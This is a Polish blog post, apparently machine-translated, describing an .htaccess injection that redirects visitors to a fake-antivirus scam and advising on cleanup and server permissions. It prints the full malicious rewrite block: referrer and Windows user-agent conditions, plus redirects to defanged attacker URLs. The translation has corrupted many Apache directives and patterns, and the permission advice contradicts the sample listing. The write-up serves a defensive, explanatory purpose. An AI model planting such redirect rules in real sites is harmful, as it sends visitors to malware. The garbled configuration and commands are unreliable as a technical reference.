przez

3

Złośliwe oprogramowanie/wirus – .htaccess "rewrite" & przeadresować

Złośliwe oprogramowanie/wirus – .htaccess "rewrite" & przeadresować

3

Nowa forma wirusa o którym widzę, że niewiele wiadomo, dotyczy to witryn hostowanych na niewiarygodne serwery gdzie mogą to być konta użytkowników/konta subdomen “Widzieć” między nimi. Dokładniej, wszystkie konta hostingowe są umieszczone w folderze “vhosty“oraz prawa autorskie do folderze użytkownika Z “vhosty” jest on przekazywany zwykłemu użytkownikowi… w większości sytuacji sprzedawcą. Jest to typowa metoda serwerów WWW, z której nie korzystamy WHM/cPanel.

Działanie wirusa .htaccess –  .htaccess hack

wirus mieć wpływ na pliki .htaccess strony ofiary. Dodano linie / dyrektywa do którego przekierowywać gości (pochodzą z witryn i portali o dużym ruchu Yahoo, MSN, Google, Facebook, Yaindex, Twitter, Myspace itp.) do niektórych witryn oferujących “rozwiązania antywirusowe“. Chodzi o fałszywe rozwiązania antywirusowe, o którym pisałem we wstępie z .

Oto jak wygląda jeden z nich .htaccess dotknięty: (nie otwieraj adresów URL podanych w treści wierszy poniżej)

ErrorDocument 500 hxxp://wwww.peorianaczyniowesurgery.com/main.php?i=J8iiidsar/qmiRj7V8NOyJoXpA==&e=0
Dokument błędu 502 hxxp://wwww.peorianaczyniowesurgery.com/main.php?i=J8iiidsar/qmiRj7V8NOyJoXpA==&e=2
Dokument błędu 403 hxxp://wwww.peorianaczyniowesurgery.com/main.php?i=J8iiidsar/qmiRj7V8NOyJoXpA==&e=3

Przepisz silnik włączony

PrzepiszWarunek %{HTTP_REFERER} .*yandex.*$ [NC,OR]
PrzepiszWarunek %{HTTP_REFERER} .*odnoklassniki.*$ [NC,OR]
PrzepiszWarunek %{HTTP_REFERER} .*vkontakte.*$ [NC,OR]
PrzepiszWarunek %{HTTP_REFERER} .*rambler.*$ [NC,OR]
PrzepiszWarunek %{HTTP_REFERER} .*tube.*$ [NC,OR]
PrzepiszWarunek %{HTTP_REFERER} .*wikipedia.*$[NC,OR]
PrzepiszWarunek %{HTTP_REFERER} .*blogger.*$ [NC,OR]
PrzepiszWarunek %{HTTP_REFERER} .*baidu.*$ [NC,OR]
PrzepiszWarunek %{HTTP_REFERER} .*qq.com.*$ [NC,OR]
PrzepiszWarunek %{HTTP_REFERER} .*myspace.*$ [NC,OR]
PrzepiszWarunek %{HTTP_REFERER} .*twitter.*$ [NC,OR]
PrzepiszWarunek %{HTTP_REFERER} .*facebook.*$ [NC,OR]
PrzepiszWarunek %{HTTP_REFERER} .*google.*$ [NC,OR]
PrzepiszWarunek %{HTTP_REFERER} .*na żywo.*$ [NC,OR]
PrzepiszWarunek %{HTTP_REFERER} .*aol.*$ [NC,OR]
PrzepiszWarunek %{HTTP_REFERER} .*bing.*$ [NC,OR]
PrzepiszWarunek %{HTTP_REFERER} .*msn.*$ [NC,OR]
PrzepiszWarunek %{HTTP_REFERER} .*amazon.*$ [NC,OR]
PrzepiszWarunek %{HTTP_REFERER} .*ebay.*$ [NC,OR]
PrzepiszWarunek %{HTTP_REFERER} .*linkedin.*$ [NC,OR]
PrzepiszWarunek %{HTTP_REFERER} .*flickr.*$ [NC,OR]
PrzepiszWarunek %{HTTP_REFERER} .*livejasmin.*$ [NC,OR]
PrzepiszWarunek %{HTTP_REFERER} .*soso.*$ [NC,OR]
PrzepiszWarunek %{HTTP_REFERER} .*podwójne kliknięcie.*$ [NC,OR]
PrzepiszWarunek %{HTTP_REFERER} .*pornhub.*$ [NC,OR]
PrzepiszWarunek %{HTTP_REFERER} .*orkut.*$ [NC,OR]
PrzepiszWarunek %{HTTP_REFERER} .*dziennik na żywo.*$ [NC,OR]
PrzepiszWarunek %{HTTP_REFERER} .*wordpress.*$ [NC,OR]
PrzepiszWarunek %{HTTP_REFERER} .*yahoo.*$ [NC,OR]
PrzepiszWarunek %{HTTP_REFERER} .*zapytaj.*$ [NC, LUB]
PrzepiszWarunek %{HTTP_REFERER} .*excite.*$ [NC,OR]
PrzepiszWarunek %{HTTP_REFERER} .*altavista.*$ [NC,OR]
PrzepiszWarunek %{HTTP_REFERER} .*msn.*$ [NC,OR]
PrzepiszWarunek %{HTTP_REFERER} .*netscape.*$ [NC,OR]
PrzepiszWarunek %{HTTP_REFERER} .*hotbot.*$ [NC,OR]
PrzepiszWarunek %{HTTP_REFERER} .*goto.*$ [NC,OR]
PrzepiszWarunek %{HTTP_REFERER} .*wyszukiwanie informacji.*$ [NC,OR]
PrzepiszWarunek %{HTTP_REFERER} .*mamma.*$ [NC,OR]
PrzepiszWarunek %{HTTP_REFERER} .*alltheweb.*$ [NC,OR]
PrzepiszWarunek %{HTTP_REFERER} .*lycos.*$ [NC,OR]
PrzepiszWarunek %{HTTP_REFERER} .*szukaj.*$ [NC,OR]
PrzepiszWarunek %{HTTP_REFERER} .*metacrawler.*$ [NC,OR]
PrzepiszWarunek %{HTTP_REFERER} .*mail.*$ [NC,OR]
PrzepiszWarunek %{HTTP_REFERER} .*dogpile.*$ [NC]

PrzepiszCond %{HTTP_USER_AGENT} .*Windows.*
RewriteRule .* hxxp://wwww.peorianaczyniowesurgery.com/main.php?h=%{HTTP_HOST}&i=J8iiidsar/qmiRj7V8NOyJoXpA==&e=r [R,L]

Przepisz warunek %{REQUEST_FILENAME} !-f
Przepisz warunek %{REQUEST_FILENAME} !-d
PrzepiszWarunek %{REQUEST_FILENAME} !.*jpg$|.*gif$|.*png$
PrzepiszCond %{HTTP_USER_AGENT} .*Windows.*
RewriteRule .* hxxp://wwww.peorianaczyniowesurgery.com/main.php?h=%{HTTP_HOST}&i=J8iiidsar/qmiRj7V8NOyJoXpA==&e=4 [R,L]

Osoby korzystające z WordPressa znajdą te linie w pliku .htaccess Z publiczny_html. Ponadto wirus tworzy w folderze identyczny plik .htaccess zawartość wp.

*Zdarzają się również sytuacje, w których zamiast peorianaczyniowesurgery.com pojawia się dns.thesoulfoodcafe.com lub inne adresy.

Co robi ten wirus?

Po przekierowaniu odwiedzający jest witany z otwartymi ramionami komunikatem:

Ostrzeżenie!
Na Twoim komputerze występują różne oznaki obecności wirusów i złośliwego oprogramowania. Twój system wymaga natychmiastowego sprawdzenia antywirusa!
Bezpieczeństwo systemu wykona szybkie i bezpłatne skanowanie Twojego komputera w poszukiwaniu wirusów i złośliwych programów.

malware 1

Niezależnie od tego, który przycisk naciśniemy, zostaniemy przeniesieni na stronę “Mój komputer“, stworzony do naśladowania projekt XP. Tutaj zaczyna się automatycznie “Proces skanowania”, na końcu którego to odkrywamy “jesteśmy zarażeni”.

malware 2

Po naciśnięciu OK lub Anuluj rozpocznie się pobieraćpliku setup.exe. Ten setup.exe to fałszywy program antywirusowy co wpływa na system. Zainstaluje szereg szkodliwych aplikacji, które będą dalej rozprzestrzeniać zainfekowane linki, a oprócz tego: oprogramowanie antywirusowe (również fałszywy), do zakupu którego ofiara jest proszona.
Mogą z niego skorzystać osoby, które już zetknęły się z tą formą wirusa . Zalecane jest również przeskanowanie całego dysku twardego. polecić Kaspersky Internet Security Lub Kaspersky antywirus.

Ta forma wirusa atakuje systemy operacyjne osób posiadających systemy operacyjne Windows XP, Windows ME, Windows 2000, Windows NT, Windows 98 i Windows 95. Jak dotąd nie są znane żadne przypadki infekcji systemów operacyjnych Windows Vista i Windows 7.

Jak możemy usunąć tego wirusa .htaccess z serwera i jak możemy zapobiec infekcji.

1. Analiza plików i usuwanie podejrzanych kodów. Aby mieć pewność, że problem dotyczy nie tylko pliku .htaccess dobrze jest analizujemy wszystkie pliki .php i .js.

2. Przepisujemy plik .htaccess i ustawiamy go chmod 644 Lub 744 z włączonymi tylko prawami zapisu użytkownik-ul właściciel.

3. Podczas tworzenia konta hostingowego dla witryny w folderze /dom Lub /webroot automatycznie zostanie utworzony folder, który zwykle zawiera nazwę użytkownika (użytkownik cpanelu, ftpitp.). Aby zapobiec zapisywaniu danych i przenoszeniu wirusów z jednego użytkownika na drugiego, zaleca się ustawienie dla każdego folderu użytkownika:

chmod 644 lub 744, 755 – wskazane jest 644.
chown -R użytkownik_numer_folder_numer.
chgrp -R numer_użytkownika numer_folderu

jest -wszystko aby sprawdzić, czy tryby zostały ustawione prawidłowo. Powinno pojawić się coś takiego:

drwx–X–x 12 dynamika dynamika 4096 6 maja 14:51 dynamika/
drwx–X–x 10 duran duran 4096 7 marca 07:46 duran/
drwx–X–x 12 probówek probówki 4096 29 stycznia 11:23 probówki/
drwxr-xr-x 14 express express 4096 26 lutego 2009 express/
drwxr-xr-x 9 te te 4096 19 maja 01:09 te/
drwx–X–x 9 gospodarstwo gospodarstwo 4096 19 grudnia 22:29 gospodarstwo/

Jeśli jeden z powyższych użytkowników będzie miał FTP zainfekowane pliki, nie będzie mógł wysłać wirusa do innego hostowanego użytkownika. Jest to minimalny środek bezpieczeństwa chroniący konta hostowane na serwerze internetowym.

Typowe elementy domen dotkniętych tym typem wirusa.

Wszystkie domeny, których to dotyczy, przekierowują odwiedzających do witryn zawierających nazwę domeny “/main.php?e=4&H“.

Ten “wirus .htaccess” wpływa na każdy typ CMS-a (Joomla, WordPress, phpBBitp.), który używa .htaccess.

Hakowanie wirusa .htaccess & Przeadresować.

Złośliwe oprogramowanie/wirus – .htaccess "rewrite" & przeadresować

Może zainteresują Cię także...

3 przemyślenia na temat “Złośliwe oprogramowanie/wirus – .htaccess "rewrite" & przeadresować

Zostaw odpowiedź

Twój adres e-mail nie zostanie opublikowany. Wymagane pola są oznaczone *